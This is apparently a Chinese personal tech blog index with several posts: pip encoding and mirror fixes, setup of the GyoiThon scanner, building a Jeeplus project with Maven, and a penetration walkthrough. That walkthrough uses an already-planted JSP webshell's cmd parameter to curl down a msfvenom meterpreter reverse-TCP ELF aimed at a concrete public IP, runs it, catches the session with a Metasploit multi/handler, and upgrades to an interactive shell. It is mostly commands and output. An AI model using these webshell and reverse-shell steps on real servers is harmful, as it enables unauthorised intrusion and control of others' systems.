        at org.gradle.launcher.Main.doAction(Main.java:33)
        at org.gradle.launcher.bootstrap.EntryPoint.run(EntryPoint.java:45)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at org.gradle.launcher.bootstrap.ProcessBootstrap.runNoExit(ProcessBootstrap.java:54)
        at org.gradle.launcher.bootstrap.ProcessBootstrap.run(ProcessBootstrap.java:35)
        at org.gradle.launcher.GradleMain.main(GradleMain.java:23)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at org.gradle.wrapper.BootstrapMainStarter.start(BootstrapMainStarter.java:33)
        at org.gradle.wrapper.WrapperExecutor.execute(WrapperExecutor.java:130)
        at org.gradle.wrapper.GradleWrapperMain.main(GradleWrapperMain.java:48)

FAILURE: Build failed with an exception.

https://blog.csdn.net/coder_ken/article/details/50853927

[Read More]

「渗透」:一句话反弹docker-shell

Apr 27, 2020. | By: Bin4xin

一句话木马反弹shell

前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用pythonbash还是perl都反弹不了,偷不了懒,就上msf把。

http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd
/u01/oracle/user_projects/domains/base_domain
http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=whoami
oracle

msf生成shell文件

msfvenom先生成反弹shell文件,赋权。

root@iZj6cgn7odv59wmjjhe6zwZ:~## msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=47.52.233.92 LPORT=1234 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1046632 bytes
Final size of elf file: 1046632 bytes
root@iZj6cgn7odv59wmjjhe6zwZ:~## chmod 777 shell.elf
http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=ls
测试一下一句话木马是可以执行命令的
total 1100
drwxr-x--- 15 oracle oracle    4096 Apr 27 08:06 .
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 ..
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 autodeploy
drwxr-x---  6 oracle oracle    4096 Apr 25 00:23 bin
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 common
drwxr-x---  9 oracle oracle    4096 Apr 25 00:24 config
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 console-ext
-rw-r-----  1 oracle oracle     234 Apr 25 00:23 derby.log
-rw-r-----  1 oracle oracle     257 Apr 25 00:24 edit.lok
-rw-r-----  1 oracle oracle     327 Jul 19  2017 fileRealm.properties
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 init-info
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 lib
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 nodemanager
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 orchestration
drwxr-x---  2 oracle oracle    4096 Apr 26 01:39 original
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 security
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 servers
-rwxr-x---  1 oracle oracle     261 Apr 25 00:23 startWebLogic.sh
drwxr-x---  3 oracle oracle    4096 Apr 25 09:49 tmp

下载shell文件执行

在一句话木马上执行下载命令,WgetCurl都可以,一般linux机器上都自带下载工具

http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=curl -o shell.elf http://ip/shell.elf
等待下载完毕;继续赋权
chmod 777 shell.elf
在查看一下:
total 1100
drwxr-x--- 15 oracle oracle    4096 Apr 27 08:06 .
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 ..
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 autodeploy
drwxr-x---  6 oracle oracle    4096 Apr 25 00:23 bin
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 common
drwxr-x---  9 oracle oracle    4096 Apr 25 00:24 config
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 console-ext
-rw-r-----  1 oracle oracle     234 Apr 25 00:23 derby.log
-rw-r-----  1 oracle oracle     257 Apr 25 00:24 edit.lok
-rw-r-----  1 oracle oracle     327 Jul 19  2017 fileRealm.properties
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 init-info
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 lib
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 nodemanager
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 orchestration
drwxr-x---  2 oracle oracle    4096 Apr 26 01:39 original
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 security
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 servers
-rwxrwxrwx  1 oracle oracle 1046632 Apr 27 08:06 shell.elf
-rwxr-x---  1 oracle oracle     261 Apr 25 00:23 startWebLogic.sh
drwxr-x---  3 oracle oracle    4096 Apr 25 09:49 tmp

shell流量接入

我们发现已经成功下载了反弹shell的msf文件,直接执行 http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=./shell.elf,执行前别忘了在服务器上监听端口。

# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:1234

执行完就可以看到建立连接的流量接入了:

[*] Meterpreter session 1 opened (172.31.116.237:1234 -> 59.110.152.168:44832) at 2020-04-27 16:08:48 +0800

下一步:

meterpreter > shell
Process 460 created.
Channel 1 created.
whoami
oracle
python -c 'import pty;pty.spawn("/bin/sh")'
sh-4.2$ whoami
whoami
oracle
sh-4.2$ sudo su
sudo su
sh: sudo: command not found
python -c 'import pty;pty.spawn("/bin/bash")'
[oracle@5c6fe690ac22 base_domain]$ pwd
pwd
/u01/oracle/user_projects/domains/base_domain
[oracle@5c6fe690ac22 base_domain]$ ls
ls
autodeploy  console-ext           init-info      original   startWebLogic.sh
bin         derby.log             lib            security   tmp
common      edit.lok              nodemanager    servers
config      fileRealm.properties  orchestration  shell.elf
[oracle@5c6fe690ac22 base_domain]$ uname -a
uname -a
Linux 5c6fe690ac22 3.10.0-1062.12.1.el7.x86_64 ##1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

以上。

[Read More]

「Terminal」:pip报错'unkown-encoding'

Apr 1, 2020. | By: Bin4xin

  • 可怖的unkown encoding.

自从修改了windows终端的编码格式后,就出了各种问题,几乎在终端上执行的软件都运行不了,提示LookupError: unknown encoding: cp65001,如下报错。

C:\Users\本阿信>pip --version
Traceback (most recent call last):
  File "c:\python27\lib\runpy.py", line 174, in _run_module_as_main
    "__main__", fname, loader, pkg_name)
  File "c:\python27\lib\runpy.py", line 72, in _run_code
    exec code in run_globals
  File "C:\Python27\Scripts\pip.exe\__main__.py", line 4, in <module>
  File "c:\python27\lib\site-packages\pip\_internal\cli\main.py", line 10, in <module>
    from pip._internal.cli.autocompletion import autocomplete
  File "c:\python27\lib\site-packages\pip\_internal\cli\autocompletion.py", line 9, in <module>
    from pip._internal.cli.main_parser import create_main_parser
  File "c:\python27\lib\site-packages\pip\_internal\cli\main_parser.py", line 7, in <module>
    from pip._internal.cli import cmdoptions
  File "c:\python27\lib\site-packages\pip\_internal\cli\cmdoptions.py", line 31, in <module>
    from pip._internal.utils.ui import BAR_TYPES
  File "c:\python27\lib\site-packages\pip\_internal\utils\ui.py", line 64, in <module>
    _BaseBar = _select_progress_class(IncrementalBar, Bar)  # type: Any
  File "c:\python27\lib\site-packages\pip\_internal\utils\ui.py", line 57, in _select_progress_class
    six.text_type().join(characters).encode(encoding)
LookupError: unknown encoding: cp65001

只能怪自己,好好的改什么txt文本编码,现在好了。解铃还须系铃人:暂时在该终端下可以使用pip

C:\Users\本阿信>set PYTHONIOENCODING=UTF-8

C:\Users\本阿信>pip --version
pip 20.0.2 from c:\python27\lib\site-packages\pip (python 2.7)

链接还建议设置全局变量为$env:PYTHONIOENCODING = "UTF-8",但是我搜索了一下,没有找到方法,希望会的朋友邮件我教我。 CHCP 936


UTF-8是unicode编码的一种落地方案:

Unicode符号范围 | UTF-8编码方式 (十六进制) | (二进制) ——————–+——————————————— 0000 0000-0000 007F | 0xxxxxxx 0000 0080-0000 07FF | 110xxxxx 10xxxxxx 0000 0800-0000 FFFF | 1110xxxx 10xxxxxx 10xxxxxx 0001 0000-0010 FFFF | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx

\x对应的是UTF-8编码的数据,通过转化规则可以转换为Unicode编码,就能得到对应的汉字,转换规则很简单,先将\x去掉,转换为数字,然后进行对应的位移操作即可,需要注意的是先要判断utf-8的位数.

联系我:chihou.pro@gmail.com ^_^谢谢

[Read More]

「机器学习」:sklearn-学习记录-pip

Feb 21, 2020. | By: Bin4xin

pip的环境问题

pip-timeout

安装scikit-learn依赖包,安装时一直报错time out超时,所以加上了default-timeout参数:

pip3 --default-timeout=1000 install -U scikit-learn
 Downloading https://pypi.tuna.tsinghua.edu.cn/packages/73/db/7d8204ddba84ab5d1e4fd1af8f82bbe39c589488bee71e45c662f4144010/scikit_learn-0.22.1-cp37-cp37m-manylinux1_x86_64.whl (7.0MB)
    100% |████████████████████████████████| 7.0MB 159kB/s 
Successfully installed scikit-learn-0.22.1
pip3 --default-timeout=1000 install -U SciPy
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/dd/82/c1fe128f3526b128cfd185580ba40d01371c5d299fcf7f77968e22dfcc2e/scipy-1.4.1-cp37-cp37m-manylinux1_x86_64.whl (26.1MB)
    100% |████████████████████████████████| 26.1MB 44kB/s 
Successfully installed SciPy-1.4.1

国内换源

或者还有一种可能是因为pip找的库在国外的库,会导致下载速度过慢。这种情况可以直接换成国内的源

vi ~/.pip/pip.conf
把下面内容放进去
[global]
timeout = 6000
index-url = https://pypi.tuna.tsinghua.edu.cn/simple/
*******
**pip国内的一些镜像
*******
  阿里云 http://mirrors.aliyun.com/pypi/simple/ 
  中国科技大学 https://pypi.mirrors.ustc.edu.cn/simple/ 
  豆瓣(douban) http://pypi.douban.com/simple/ 
  清华大学 https://pypi.tuna.tsinghua.edu.cn/simple/ 
  中国科学技术大学 http://pypi.mirrors.ustc.edu.cn/simple/

windows下:

进入C:\Users\用户名\pip在pip目录下新建文件没有新建文件夹
pip.ini
同样输入上面的内容即可

测试

可以看到,下载依赖已经在我们指定的pip库里索引了。

# pip install pandas
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple
Requirement already satisfied: pandas in /usr/local/lib/python2.7/dist-packages (0.24.2)
Requirement already satisfied: pytz>=2011k in /usr/lib/python2.7/dist-packages (from pandas) (2019.3)
Requirement already satisfied: numpy>=1.12.0 in /usr/local/lib/python2.7/dist-packages (from pandas) (1.16.6)
Requirement already satisfied: python-dateutil>=2.5.0 in /usr/local/lib/python2.7/dist-packages (from pandas) (2.8.1)
Requirement already satisfied: six>=1.5 in /usr/lib/python2.7/dist-packages (from python-dateutil>=2.5.0->pandas) (1.14.0)

[Read More]

「资产扫描」:Let's GyoiThon !

Jan 21, 2020. | By: Bin4xin

title:GyoiThon Scanner

1 下载依赖项

下载源文件后,进入文件夹路径,根据python的依赖进行安装,即requirements.txt文件:

PS G:\GyoiThon> pip install -r requirements.txt
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting beautifulsoup4>=4.6.3
  Using cached https://files.pythonhosted.org/packages/c5/48/c88b0b390ae1f785942fc83413feb1268a1eb696f343d4d55db735b9bb39/beautifulsoup4-4.8.2-py2-none-any.whl
Requirement already satisfied: cchardet>=2.1.4 in c:\python27\lib\site-packages (from -r requirements.txt (line 2)) (2.1.5)
Collecting censys>=0.0.8
  Using cached https://files.pythonhosted.org/packages/88/4b/3ca07679928c26bb5503b53c37e2f6eef2521289956e2c1bf74b64008afa/censys-0.0.8.tar.gz
Requirement already satisfied: docopt>=0.6.2 in c:\python27\lib\site-packages (from -r requirements.txt (line 4)) (0.6.2)
Collecting google-api-python-client>=1.7.4
  Using cached https://files.pythonhosted.org/packages/31/c7/16ca16d28f2d71c8bd6fa67c91eb2a82259dc589c0504f903b675ecdaa84/google_api_python_client-1.7.11-py2-none-any.whl
Collecting Jinja2>=2.10.1
  Using cached https://files.pythonhosted.org/packages/65/e0/eb35e762802015cab1ccee04e8a277b03f1d8e53da3ec3106882ec42558b/Jinja2-2.10.3-py2.py3-none-any.whl
ERROR: Could not find a version that satisfies the requirement matplotlib>=3.0.3 (from -r requirements.txt (line 7)) (from versions: 0.86, 0.86.1, 0.86.2, 0.91.0, 0.91.1, 1.0.1, 1.1.0, 1.1.1, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.4.0, 1.4.1rc1, 1.4.1, 1.4.2, 1.4.3, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 2.0.0b1, 2.0.0b2, 2.0.0b3, 2.0.0b4, 2.0.0rc1, 2.0.0rc2, 2.0.0, 2.0.1, 2.0.2, 2.1.0rc1, 2.1.0, 2.1.1, 2.1.2, 2.2.0rc1, 2.2.0, 2.2.2, 2.2.3, 2.2.4)
ERROR: No matching distribution found for matplotlib>=3.0.3 (from -r requirements.txt (line 7))

报错ERROR: No matching distribution found for matplotlib>=3.0.3 (from -r requirements.txt (line 7))称没有找到匹配的版本,以为是pip的版本问题,所以进行pip版本升级。

python -m pip install --upgrade pip

DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Requirement already up-to-date: pip in c:\python27\lib\site-packages (19.3.1)

1.1 报错解决

但是依然无效,系统提示pip为最新版本。思索着应该是python的版本问题。直接就上python3
使用pip3进行下载更新:

pip3 install -r requirements.txt -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com

##速度可以感受一下
Looking in indexes: http://pypi.douban.com/simple/
Requirement already satisfied: beautifulsoup4>=4.6.3 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (4.8.0)
Collecting cchardet>=2.1.4 (from -r requirements.txt (line 2))
  Downloading http://pypi.doubanio.com/packages/c6/20/905b6c5664736d884a40ac3b1204ab874c3c4a8ce86f7b2e28abc1fc6ee4/cchardet-2.1.5-cp37-cp37m-manylinux1_x86_64.whl (241kB)
    100% |████████████████████████████████| 245kB 6.9MB/s 
Collecting censys>=0.0.8 (from -r requirements.txt (line 3))

-i $url --trust-host $host此参数则是指定pip下载更新的url库。
后来发现,requirements中,matplotlib>=3.0.3这一项依赖需要python3.6版本以上,所以运行会报错。

cat /media/root/binAxin/GyoiThon/requirements.txt 
beautifulsoup4>=4.6.3
cchardet>=2.1.4
censys>=0.0.8
docopt>=0.6.2
google-api-python-client>=1.7.4
Jinja2>=2.10.1
matplotlib>=3.0.3
msgpack-python>=0.5.6
networkx>=2.2
pandas>=0.22.0
pysocks>=1.6.7
Scrapy>=1.5.0
tldextract>=2.2.1
urllib3>=1.25

2 扫描使用

2.1 配置host

运行gyoithon后,会在module文件夹对CVE漏洞进行更新配置,此时我们等待即可。看一下简介:

GyoiThon是一款基于机器学习的渗透测试工具


GyoiThon根据学习数据识别安装在Web服务器上的软件(操作系统,中间件,框架,CMS等)。之后,GyoiThon为已识别的软件执行有效的攻击。最终,GyoiThon会自动生成扫描结果报告。


上述处理均由GyoiThon自动执行;用户唯一的操作就是在GyoiThon中,输入目标web服务器的首页URL。这非常的简单,几乎不花费你任何的时间和精力,就能让你轻松的识别Web服务器上的漏洞。 所以GyoiThon需要一些识别项(特征库)进行匹配,下载完后,就可以使用扫描器了;需要注意的是,我们运行前需要对host文件进行配置

# ls
config.ini   handout   LICENSE  __pycache__  requirements.txt  util.py
docker       host.txt  logs     README.md    signatures        util.pyc
gyoithon.py  img       modules  report       temp_signatures

# cat host.txt 
http localhost 80 /

如上,格式为:
协议<空格>url地址<空格>端口号<空格>路径

PS G:\GyoiThon> python3 .\gyoithon.py

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 ██████╗██╗   ██╗ ██████╗ ██╗████████╗██╗  ██╗ ██████╗ ███╗   ██╗
██╔════╝╚██╗ ██╔╝██╔═══██╗██║╚══██╔══╝██║  ██║██╔═══██╗████╗  ██║
██║  ███╗╚████╔╝ ██║   ██║██║   ██║   ███████║██║   ██║██╔██╗ ██║
██║   ██║ ╚██╔╝  ██║   ██║██║   ██║   ██╔══██║██║   ██║██║╚██╗██║
╚██████╔╝  ██║   ╚██████╔╝██║   ██║   ██║  ██║╚██████╔╝██║ ╚████║
 ╚═════╝   ╚═╝    ╚═════╝ ╚═╝   ╚═╝   ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝  (beta)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
by gyoithon.py

       =[ GyoiThon v0.0.3-beta                               ]=
+ -- --=[ Author  : Gyoiler (@gyoithon)                      ]=--
+ -- --=[ Website : https://github.com/gyoisamurai/GyoiThon/ ]=--

扫描完成后,扫描器就会出一个csv的报告查看即可。

以上。

[Read More]

「代码审计」:Maven构建Jeeplus项目

Jan 19, 2020. | By: Bin4xin

1. Maven构建

第一步获取Maven构建的项目,只有用Maven构建的java项目,我们才能够Maven进行构建部署。
下面这个是我用来练手的项目。自己也可以到github上找到。

此处Maven环境配置略过。多提一句,这里包括Maven的本地环境变量的配置和本地仓库的配置,自行问度娘

#PS 进入你自己的Maven项目文件夹,我的是G:\yj-work\java-code\jeeplus-open
PS C:\Users\本阿信> cd G:\yj-work\java-code\jeeplus-open
PS G:\yj-work\java-code\jeeplus-open> ls


    目录: G:\yj-work\java-code\jeeplus-open


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2020/1/10     16:26                .idea
d-----         2020/1/9     11:03                .settings
d-----         2020/1/9     11:03                src
d-----         2020/1/9     11:03                target
-a----         2020/1/9     11:03           1350 .classpath
-a----         2020/1/9     11:03           1444 .project
-a----         2016/9/4      9:11          10252 LICENSE
-a----         2016/9/4      9:11          23054 pom.xml
-a----         2016/9/4      9:11            371 README.md

1.1 effective-pom构建

如上,关键pom属性;
上面可以看到maven构建的pom.xml文件。输入命令mvn help:effective-pom
Maven 将会开始处理并显示 effective-pom。如下:

PS G:\yj-work\java-code\jeeplus-open> mvn help:effective-pom
[INFO] Scanning for projects...
[WARNING]
[WARNING] Some problems were encountered while building the effective model for jeeplus:jeeplus:war:1.0.0-SNAPSHOT
[WARNING] 'dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: javax.servlet.jsp:jsp-api:jar -> version 2.1 vs 2.2 @ line 278, column 21
[WARNING]
[WARNING] It is highly recommended to fix these problems because they threaten the stability of your build.
[WARNING]
[WARNING] For this reason, future Maven versions might no longer support building such malformed projects.
[WARNING]
[INFO]
[INFO] --------------------------< jeeplus:jeeplus >---------------------------
[INFO] Building jeeplusx 1.0.0-SNAPSHOT
[INFO] --------------------------------[ war ]---------------------------------
[INFO]
[INFO] --- maven-help-plugin:3.2.0:effective-pom (default-cli) @ jeeplus ---
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven-model/3.6.1/maven-model-3.6.1.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven-model/3.6.1/maven-model-3.6.1.pom (4.0 kB at 4.1 kB/s)
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven/3.6.1/maven-3.6.1.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven/3.6.1/maven-3.6.1.pom (24 kB at 95 kB/s)

###################################################
################中间具体下载过程略:>##################
###################################################

我把这下面的部分,特意区分出来,方便看的更清楚,当我们对项目进行构建时,我们可以看到项目相关的一些元素。有的时候,当我们还是新手的时候,这样的控制台输出真的会令人激动!@-@

`如下,maven回显出有关于jeeplus的Effective POMs`[INFO]
Effective POMs, after inheritance, interpolation, and profiles are applied:

<?xml version="1.0" encoding="GBK"?>
<!-- ====================================================================== -->
<!--                                                                        -->
<!-- Generated by Maven Help Plugin on 2020-01-19T15:52:57+08:00            -->
<!-- See: http://maven.apache.org/plugins/maven-help-plugin/                -->
<!--                                                                        -->
<!-- ====================================================================== -->
<!-- ====================================================================== -->
<!--                                                                        -->
<!-- Effective POM for project 'jeeplus:jeeplus:war:1.0.0-SNAPSHOT'         -->
<!--                                                                        -->
<!-- ====================================================================== -->

###################################################
######中间具体groupid、artifactid等配置略:>###########
###################################################

[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  12.235 s
[INFO] Finished at: 2020-01-19T15:53:00+08:00
[INFO] ------------------------------------------------------------------------

在上面的pom.xml中可以看到 Maven 在执行目标时需要用到的默认工程源码目录结构、输出目录、需要的插件、仓库和报表目录。Maven 的 pom.xml 文件也不需要手工编写。Maven 提供了大量的原型插件来创建工程,包括工程结构和pom.xml

2 properties文件配置

进入jeeplus项目,根据自己电脑的不同环境,对properties文件进行配置,自定义配置sql数据如\src\main\resources\jeeplus.properties;比如本地运行的为mysql数据库,我单单把mysql数据库的配置代码贴出来,如下:

#mysql database setting
jdbc.type=mysql
jdbc.driver=com.mysql.jdbc.Driver
jdbc.url=jdbc:mysql://localhost:3306/jeeplus_schema?useUnicode=true&characterEncoding=utf-8
jdbc.username=root
jdbc.password=root

把mysql数据库的账号密码设置成本地的数据库账号密码就好,比如我本地的mysql账号密码均为root,填上正确即可,不然会报错。然后打开mysqld,下一步就进行maven构建。

3 maven测试

3.1 test

输入mvn test,查看maven构建java项目是否存在报错:

PS G:\yj-work\java-code\jeeplus-open> mvn test
[INFO] Scanning for projects...
[WARNING]
[WARNING] Some problems were encountered while building the effective model for jeeplus:jeeplus:war:1.0.0-SNAPSHOT
[WARNING] 'dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: javax.servlet.jsp:jsp-api:jar -> version 2.1 vs 2.2 @ line 278, column 21
[WARNING]
[WARNING] It is highly recommended to fix these problems because they threaten the stability of your build.
[WARNING]
[WARNING] For this reason, future Maven versions might no longer support building such malformed projects.
[WARNING]
[INFO]
[INFO] --------------------------< jeeplus:jeeplus >---------------------------
[INFO] Building jeeplusx 1.0.0-SNAPSHOT
[INFO] --------------------------------[ war ]---------------------------------
[INFO]
[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] Copying 65 resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:compile (default-compile) @ jeeplus ---
[INFO] Changes detected - recompiling the module!
[INFO] Compiling 258 source files to G:\yj-work\java-code\jeeplus-open\target\classes
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 某些输入文件使用或覆盖了已过时的 API。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 有关详细信息, 请使用 -Xlint:deprecation 重新编译。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 某些输入文件使用了未经检查或不安全的操作。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 有关详细信息, 请使用 -Xlint:unchecked 重新编译。
[INFO]
[INFO] --- maven-resources-plugin:2.6:testResources (default-testResources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] skip non existing resourceDirectory G:\yj-work\java-code\jeeplus-open\src\test\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:testCompile (default-testCompile) @ jeeplus ---
[INFO] No sources to compile
[INFO]
[INFO] --- maven-surefire-plugin:2.12.4:test (default-test) @ jeeplus ---
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  10.063 s
[INFO] Finished at: 2020-01-19T16:46:53+08:00
[INFO] ------------------------------------------------------------------------

3.2 clean package

紧接着输入mvn clean package命令;

PS G:\yj-work\java-code\jeeplus-open> mvn clean package
[INFO] Scanning for projects...
[WARNING]
[WARNING] Some problems were encountered while building the effective model for jeeplus:jeeplus:war:1.0.0-SNAPSHOT
[WARNING] 'dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: javax.servlet.jsp:jsp-api:jar -> version 2.1 vs 2.2 @ line 278, column 21
[WARNING]
[WARNING] It is highly recommended to fix these problems because they threaten the stability of your build.
[WARNING]
[WARNING] For this reason, future Maven versions might no longer support building such malformed projects.
[WARNING]
[INFO]
[INFO] --------------------------< jeeplus:jeeplus >---------------------------
[INFO] Building jeeplusx 1.0.0-SNAPSHOT
[INFO] --------------------------------[ war ]---------------------------------
[INFO]
[INFO] --- maven-clean-plugin:2.5:clean (default-clean) @ jeeplus ---
[INFO] Deleting G:\yj-work\java-code\jeeplus-open\target
[INFO]
[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] Copying 65 resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:compile (default-compile) @ jeeplus ---
[INFO] Changes detected - recompiling the module!
[INFO] Compiling 258 source files to G:\yj-work\java-code\jeeplus-open\target\classes
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 某些输入文件使用或覆盖了已过时的 API。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 有关详细信息, 请使用 -Xlint:deprecation 重新编译。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 某些输入文件使用了未经检查或不安全的操作。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 有关详细信息, 请使用 -Xlint:unchecked 重新编译。
[INFO]
[INFO] --- maven-resources-plugin:2.6:testResources (default-testResources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] skip non existing resourceDirectory G:\yj-work\java-code\jeeplus-open\src\test\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:testCompile (default-testCompile) @ jeeplus ---
[INFO] No sources to compile
[INFO]
[INFO] --- maven-surefire-plugin:2.12.4:test (default-test) @ jeeplus ---
[INFO] No tests to run.
[INFO]
[INFO] --- maven-war-plugin:2.2:war (default-war) @ jeeplus ---
[INFO] Packaging webapp
[INFO] Assembling webapp [jeeplus] in [G:\yj-work\java-code\jeeplus-open\target\jeeplus]
[INFO] Processing war project
[INFO] Copying webapp resources [G:\yj-work\java-code\jeeplus-open\src\main\webapp]
[INFO] Webapp assembled in [19918 msecs]
[INFO] Building war: G:\yj-work\java-code\jeeplus-open\target\jeeplus.war
[INFO] WEB-INF\web.xml already added, skipping
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  38.071 s
[INFO] Finished at: 2020-01-19T16:49:31+08:00
[INFO] ------------------------------------------------------------------------

连着build success!可真是令人激动;我们可以看到maven已经构建好了tomcat部署所需要的war包:[INFO] Building war: G:\yj-work\java-code\jeeplus-open\target\jeeplus.war,直接去对应的绝对路径,把war包ctrl+c到tomcat的webapp文件夹里就好了。

至此部署完毕,对项目查看一下,是否已经部署成功。

验证部署

多说无益,上代码:
进入tomcat/bin/目录,启动tomcat

PS E:\java\tomcat\apache-tomcat-8.5.50\bin> .\startup.bat
Using CATALINA_BASE:   "E:\java\tomcat\apache-tomcat-8.5.50"
Using CATALINA_HOME:   "E:\java\tomcat\apache-tomcat-8.5.50"
Using CATALINA_TMPDIR: "E:\java\tomcat\apache-tomcat-8.5.50\temp"
Using JRE_HOME:        "C:\Program Files\Java\jdk1.8.0_231\jre"
Using CLASSPATH:       "E:\java\tomcat\apache-tomcat-8.5.50\bin\bootstrap.jar;E:\java\tomcat\apache-tomcat-8.5.50\bin\tomcat-juli.jar"

验证是否部署成功: curl localhost/jeeplus

PS E:\java\tomcat\apache-tomcat-8.5.50\bin> curl localhost/jeeplus

StatusCode        : 200
StatusDescription :
Content           :

                    <!DOCTYPE html>
                    <html>

                        <head>
                                <meta name="description" content="User login page" />
